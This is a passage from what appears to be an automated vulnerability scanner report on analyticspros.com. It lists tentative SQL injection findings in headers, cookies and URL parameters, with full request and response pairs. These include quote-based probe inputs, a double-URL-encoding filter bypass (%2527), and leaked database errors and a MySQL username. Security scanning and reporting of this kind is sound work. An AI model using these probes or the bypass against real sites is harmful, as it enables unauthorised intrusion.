Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c''; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:19:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:19:03 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:19:03 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27263


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.154. http://www.analyticspros.com/component/content/article/65-ae/110-analytics-engine.html [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/content/article/65-ae/110-analytics-engine.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /component/content/article/65-ae/110-analytics-engine.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)'
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:28:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:28:34 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:28:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29714


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<li>Error. Feed not retrieved.</li>
...[SNIP]...

Request 2

GET /component/content/article/65-ae/110-analytics-engine.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)''
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:28:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:28:36 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:28:36 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29559


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.155. http://www.analyticspros.com/component/content/article/65-ae/110-analytics-engine.html [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/content/article/65-ae/110-analytics-engine.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /component/content/article/65-ae/110-analytics-engine.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141%2527; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:18:39 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component/content/article/65-ae/110-analytics-engine.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141%2527%2527; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:18:40 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:18:43 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:18:43 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29558


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.156. http://www.analyticspros.com/component/content/article/65-ae/110-analytics-engine.html [__utmmobile cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/content/article/65-ae/110-analytics-engine.html

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmmobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /component/content/article/65-ae/110-analytics-engine.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:21:51 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:21:52 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:21:53 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29714


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<li>Error. Feed not retrieved.</li>
...[SNIP]...

Request 2

GET /component/content/article/65-ae/110-analytics-engine.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:21:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:21:56 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:21:56 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29559


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.157. http://www.analyticspros.com/component/content/article/65-ae/110-analytics-engine.html [itemid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/content/article/65-ae/110-analytics-engine.html

Issue detail

The itemid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the itemid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /component/content/article/65-ae/110-analytics-engine.html?itemid=70#comment' HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:13:22 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component/content/article/65-ae/110-analytics-engine.html?itemid=70#comment'' HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:13:24 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.158. http://www.analyticspros.com/component/jsetup/comment/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /component%2527/jsetup/comment/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:03:23 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component%2527%2527/jsetup/comment/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:03:24 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:03:25 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 05:03:25 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16559


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.159. http://www.analyticspros.com/component/jsetup/comment/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /component/jsetup/comment'/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:24:00 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:24:04 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:24:04 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16792


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<dt class="error">
...[SNIP]...

Request 2

GET /component/jsetup/comment''/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:24:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:24:06 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:24:06 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16521


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.160. http://www.analyticspros.com/component/jsetup/comment/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /component/jsetup/comment/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:20:59 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component/jsetup/comment/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:21:01 GMT
